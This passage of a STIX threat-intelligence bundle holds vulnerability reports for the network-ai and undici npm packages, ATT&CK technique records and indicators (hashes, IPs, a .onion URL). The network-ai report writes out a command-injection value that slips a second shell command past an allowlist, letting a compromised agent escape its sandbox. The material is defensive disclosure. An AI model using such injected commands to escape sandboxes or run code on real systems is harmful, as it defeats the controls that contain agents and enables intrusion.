`azure.activitylogs.identity.authorization.evidence.principal_id` and `...principal_type` fields in alerts to determine the legitimacy and permissions of the principal performing the operation.\n- Integrate endpoint detection and response (EDR) telemetry (e.g., `process_creation` events from `WaAppAgent.exe` or `walinuxagent`) on Azure VMs to correlate with `WRITE` extension operations for script execution.\n",
      "published": "2026-06-19T12:48:20Z",
      "labels": [
        "cloud",
        "endpoint",
        "azure",
        "azure-activity-logs",
        "threat-detection",
        "execution",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345",
        "attack-pattern--94afedf1-5742-5d0f-96e9-bfb003fcb746"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.netspi.com/blog/technical-blog/adversary-simulation/7-ways-to-execute-command-on-azure-virtual-machine-virtual-machine-scale-sets/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/custom-script-windows"
        },
        {
          "source_name": "reference",
          "url": "https://hackingthe.cloud/azure/run-command-abuse/"
        },
        {
          "source_name": "reference",
          "url": "https://blog.pwnedlabs.io/diving-deep-into-azure-vm-attack-vectors"
        },
        {
          "source_name": "reference",
          "url": "https://www.sysdig.com/blog/the-expendable-extension-name-azure-vmaccess-naming-chaos-password-resets-and-a-detection-gap"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee35b831-e211-5569-819b-fe4faa2e8d86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44942bdb-403d-5ab7-83a2-6960d1168cbd",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--44942bdb-403d-5ab7-83a2-6960d1168cbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network-AI: Improper Neutralization of Special Elements used in an OS Command (CVE-2026-54051)",
      "description": "## Overview\n\nA critical command injection vulnerability, tracked as CVE-2026-54051, exists in the `network-ai` npm package, specifically affecting versions prior to 5.9.1. The flaw stems from a mismatch between the `SandboxPolicy.isCommandAllowed` function, which performs allowlist glob-matching on the entire command string, and the `ShellExecutor` which then executes this string directly via `/bin/sh -c`. This discrepancy allows an attacker to inject shell metacharacters (e.g., `;`, `|`, `$(...)`) into a command that would otherwise be approved by a broad wildcard allowlist entry (e.g., `git *`, `npm *`). This bypasses the intended security control meant to contain a compromised agent, enabling arbitrary command execution with the privileges of the orchestrator process on Linux and macOS systems. The vulnerability was publicly disclosed on June 19, 2026, via a GitHub Security Advisory (GHSA-qw6v-5fcf-5666).\n\n## Attack Chain\n\n1.  An attacker compromises or controls a `network-ai` agent process.\n2.  The `network-ai` orchestrator's `SandboxPolicy` includes a broad wildcard allowlist entry for commands (e.g., `git *`, `npm *`, `node *`).\n3.  The attacker crafts a malicious command string containing shell metacharacters, such as `git status; id \u003e /tmp/pwned.txt`.\n4.  The `SandboxPolicy.isCommandAllowed` function evaluates the full malicious string, and due to the glob-matching logic, it incorrectly determines the command is allowed.\n5.  The `ShellExecutor.execute` method proceeds to execute the approved string by invoking `/bin/sh -c \"git status; id \u003e /tmp/pwned.txt\"`.\n6.  The `/bin/sh` interpreter processes the shell metacharacters (specifically the semicolon), executing both `git status` and the injected `id \u003e /tmp/pwned.txt` command.\n7.  Arbitrary command execution is achieved, typically as the orchestrator process, allowing the attacker to bypass the intended sandbox controls and potentially escalate privileges or exfiltrate data.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54051 leads to arbitrary command execution on the system running the `network-ai` orchestrator process. This vulnerability completely undermines the primary security mechanism designed to prevent a compromised agent from executing unauthorized commands. Attackers can leverage this to gain full control over the orchestrator, leading to data exfiltration, further lateral movement, or deployment of additional malicious payloads. While specific victim numbers are not provided, any organization utilizing `network-ai` with broad wildcard allowlist entries in its `SandboxPolicy` on Linux or macOS systems is susceptible to this critical flaw.\n\n## Recommendation\n\n*   **Upgrade immediately:** Update `network-ai` package to version 5.9.1 or later to apply the patch for CVE-2026-54051.\n*   **Refine allowlists:** Review and harden `SandboxPolicy` allowlist configurations, avoiding overly broad wildcard entries like `node *` or `npm *` even after patching.\n*   **Enable logging:** Ensure `process_creation` logging (e.g., via Sysmon for Linux/macOS) is enabled to capture execution of shell interpreters and their command-line arguments.\n*   **Deploy Sigma rules:** Deploy the provided Sigma rules to detect suspicious `sh -c` invocations and anomalous command executions.\n",
      "published": "2026-06-19T13:43:05Z",
      "labels": [
        "command-injection",
        "rce",
        "node.js",
        "linux",
        "macos",
        "software-supply-chain"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qw6v-5fcf-5666"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stolen Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ba2f0b83-c2bd-5d2e-b425-930d736a8dd7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7265dae3-5c91-5861-85fc-d1a65f11df95",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Encrypted Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1573",
          "url": "https://attack.mitre.org/techniques/T1573"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c515017-23d9-5f91-8f02-e0d40d4e39b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7265dae3-5c91-5861-85fc-d1a65f11df95",
      "target_ref": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7265dae3-5c91-5861-85fc-d1a65f11df95",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "undici Library Vulnerable to Cross-Origin Request Routing via SOCKS5 Proxy Reuse (CVE-2026-6734)",
      "description": "## Overview\n\nThe `undici` Node.js HTTP/1.1 client library contains a high-severity vulnerability, identified as CVE-2026-6734, impacting its `Socks5ProxyAgent` component. This flaw, introduced in `undici` version 7.23.0 and affecting all versions up to 8.1.0, allows for cross-origin request routing. When an application uses `Socks5ProxyAgent` (either directly or via `setGlobalDispatcher`) and makes requests to multiple distinct origins, the library incorrectly reuses a single SOCKS5 connection pool without verifying that the pool's established origin matches the intended destination of subsequent requests. This misrouting can lead to sensitive data exposure, such as credentials, being sent to unintended destinations, and can cause HTTPS requests to be silently downgraded to HTTP, undermining security. This vulnerability is critical for applications that interact with various services through a shared SOCKS5 proxy agent.\n\n## Attack Chain\n\n1.  An application initializes and configures `undici` to use a `Socks5ProxyAgent` for outgoing network requests, either globally via `setGlobalDispatcher` or locally.\n2.  The application makes its first request to an `origin_A` (e.g., `malicious-domain.com`) through the configured `Socks5ProxyAgent`.\n3.  `undici` establishes a connection pool to `origin_A` via the SOCKS5 proxy, associating this pool with the first requested origin.\n4.  Subsequently, the application attempts to make a request to a legitimate `origin_B` (e.g., `secure-service.com`) using the *same* `Socks5ProxyAgent` instance.\n5.  Due to the vulnerability, `undici` reuses the existing connection pool (which was established for `origin_A`) for the request to `origin_B`, without validating the target origin.\n6.  As a result, sensitive request data, including credentials, intended for `origin_B` is misdirected and sent to `origin_A` through the established SOCKS5 proxy connection.\n7.  The application may then receive and trust responses from `origin_A`, mistakenly believing they originated from `origin_B`, leading to data corruption or further compromise.\n8.  Furthermore, if `origin_A` supports HTTP and the connection was established as such, HTTPS requests intended for `origin_B` can be silently downgraded to HTTP, compromising encryption and integrity.\n\n## Impact\n\nThe primary impact of this vulnerability is the unintended exposure of sensitive data and potential compromise of application integrity. Applications that utilize `Socks5ProxyAgent` and interact with multiple origins are at risk. Credentials and request bodies intended for one origin can be misdirected to another, allowing an attacker to intercept or manipulate data. This can lead to unauthorized access, data breaches, and service disruption. Additionally, the silent downgrade of HTTPS requests to HTTP strips away crucial transport layer security, making communications vulnerable to eavesdropping and tampering. There is no specific victim count or sector information available, but any Node.js application using vulnerable versions of `undici` in the described configuration is affected.\n\n## Recommendation\n\n*   Immediately upgrade `npm/undici` to version `v7.28.0` or `v8.2.0` or later to apply the official patches for CVE-2026-6734.\n*   If immediate upgrade is not possible, implement the recommended workarounds by using a separate `Socks5ProxyAgent` instance per origin for `undici` or avoid using `Socks5ProxyAgent` with multiple origins.\n*   Deploy the provided Sigma rules to detect anomalous network traffic from `node.exe` processes that might indicate misrouted requests, specifically observing for connections to private IP ranges or unexpected HTTP traffic to external hosts.\n*   Enable comprehensive network connection logging for `node.exe` processes on all affected operating systems to improve visibility into potential exploitation attempts.\n",
      "published": "2026-06-19T14:27:57Z",
      "labels": [
        "library-vulnerability",
        "cross-origin-request",
        "data-leakage",
        "nodejs"
      ],
      "object_refs": [
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
        "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-hm92-r4w5-c3mj"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8f9268dd-3c86-5c1b-a76d-d24745a14192",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 08a2405cd32f044a69737e77454ee2da",
      "pattern": "[file:hashes.MD5 = '08a2405cd32f044a69737e77454ee2da']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8f73d19-7387-5d6a-b053-c4f99ca8fcfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--8f9268dd-3c86-5c1b-a76d-d24745a14192"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--142211ac-635f-509b-a2fe-7e89db11023b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 0d68a310f4265821900249bec89364c2",
      "pattern": "[file:hashes.MD5 = '0d68a310f4265821900249bec89364c2']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3bf86570-cb09-5208-ba7b-ec6504ee2453",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--142211ac-635f-509b-a2fe-7e89db11023b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dfbf343a-8a79-5874-8b3f-8ac98f5b6acb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 11d795baafa44b73766e850d13b8e254",
      "pattern": "[file:hashes.MD5 = '11d795baafa44b73766e850d13b8e254']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bcc59b3c-eeca-5978-b76e-d7b9aa1f2a3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--dfbf343a-8a79-5874-8b3f-8ac98f5b6acb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c2117d72-b3f8-597d-a858-2eb3d01b7b81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 144183a4217ae0914ba0c865858d07cd",
      "pattern": "[file:hashes.MD5 = '144183a4217ae0914ba0c865858d07cd']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1a6ee47f-2c47-551a-bb7d-f5886245865a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--c2117d72-b3f8-597d-a858-2eb3d01b7b81"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0d8e0286-bd04-5d17-817a-e0852042d3d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 19ff6488a259d750ec18902fe75a713b",
      "pattern": "[file:hashes.MD5 = '19ff6488a259d750ec18902fe75a713b']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e46c93f-622b-5be5-ae90-157f784c66c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--0d8e0286-bd04-5d17-817a-e0852042d3d7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8d6d6a1a-285d-5b90-a4ed-4682d2272498",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 1bde76f3197123dcc2ecd0bfef567484",
      "pattern": "[file:hashes.MD5 = '1bde76f3197123dcc2ecd0bfef567484']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2e5aa72-2ab3-5473-ac48-732235eda6f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--8d6d6a1a-285d-5b90-a4ed-4682d2272498"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d35463d5-c8de-5a78-9c27-78d2897b9e79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 1c4bea81c0da22badd9b7eab574c51cd",
      "pattern": "[file:hashes.MD5 = '1c4bea81c0da22badd9b7eab574c51cd']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2c1f651-a09e-5fae-b346-3e3b9740d2ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--d35463d5-c8de-5a78-9c27-78d2897b9e79"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--44c5bb0a-2a38-58d4-a555-6729bfb5b005",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 2020979e080d7ac9c0403172573c7de8",
      "pattern": "[file:hashes.MD5 = '2020979e080d7ac9c0403172573c7de8']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b07f2006-ad00-5614-a5d5-806c6d1a0487",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--44c5bb0a-2a38-58d4-a555-6729bfb5b005"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3d62a89b-4be9-50bb-b2b4-d41d41e913a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 24a8fcd08d9e40d32929b57de9b15385",
      "pattern": "[file:hashes.MD5 = '24a8fcd08d9e40d32929b57de9b15385']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de898853-f835-550c-99da-8d586bab1578",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--3d62a89b-4be9-50bb-b2b4-d41d41e913a6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--955d0adf-c373-51d6-ab72-5bb6f853fee5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 2bb209ccfc5103eccab523c875050cfa",
      "pattern": "[file:hashes.MD5 = '2bb209ccfc5103eccab523c875050cfa']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a1be36de-dd8c-56f0-907a-b19f1256455f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--955d0adf-c373-51d6-ab72-5bb6f853fee5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0b1ef0a7-132d-58ca-8ae3-2fe17085238a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 176.113.115.209",
      "pattern": "[ipv4-addr:value = '176.113.115.209']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7dde3f85-491c-5ae5-94fa-04daeccaebd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--0b1ef0a7-132d-58ca-8ae3-2fe17085238a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e461d6a1-e370-541b-a97f-8b874ad7de42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 176.113.115.97",
      "pattern": "[ipv4-addr:value = '176.113.115.97']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a9e70d0d-3c00-5d0e-9f44-ffe888a2ef31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--e461d6a1-e370-541b-a97f-8b874ad7de42"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a0371ac1-ae8b-5e0e-9c90-1a9b9d3b43d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 188.119.66.189",
      "pattern": "[ipv4-addr:value = '188.119.66.189']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91421674-86bc-5640-b0df-fa15b91be19a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--a0371ac1-ae8b-5e0e-9c90-1a9b9d3b43d2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--08a64af7-9f02-5a99-875d-a9c5947fe56a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 31.41.244.100",
      "pattern": "[ipv4-addr:value = '31.41.244.100']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--273f9f52-4e29-558a-b439-d66683b07a97",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--08a64af7-9f02-5a99-875d-a9c5947fe56a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6f78510f-3147-5d6e-a365-4052e8aece1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 85.209.11.49",
      "pattern": "[ipv4-addr:value = '85.209.11.49']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac43355c-6533-53ca-83f8-66114f61bc29",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--6f78510f-3147-5d6e-a365-4052e8aece1c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1fc00151-40ab-52ac-9ed7-0ba0e11e2f19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/blog?uuid=28145869-f2d7-4dc2-9171-a26b63fbd83b",
      "pattern": "[url:value = 'http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/blog?uuid=28145869-f2d7-4dc2-9171-a26b63fbd83b']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:31:31Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2fa53d66-2aa1-556f-a36a-625096b1b766",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "indicator--1fc00151-40ab-52ac-9ed7-0ba0e11e2f19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d41a29a-0b79-5027-9d75-14717dc30e78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--588aed2a-a577-5af6-876f-8ca4104947c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--289b18f9-ea52-595c-b52d-df56d25702b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54e4da43-850b-5379-ac45-ddd5e1f42c01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--60fed829-0c8d-55b8-81d8-2b8dfb3d9b44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b02e659d-9a7a-53bd-8c3a-74ec696f4103",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cbf9c58f-13c8-5af4-8643-58d92f2c66d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
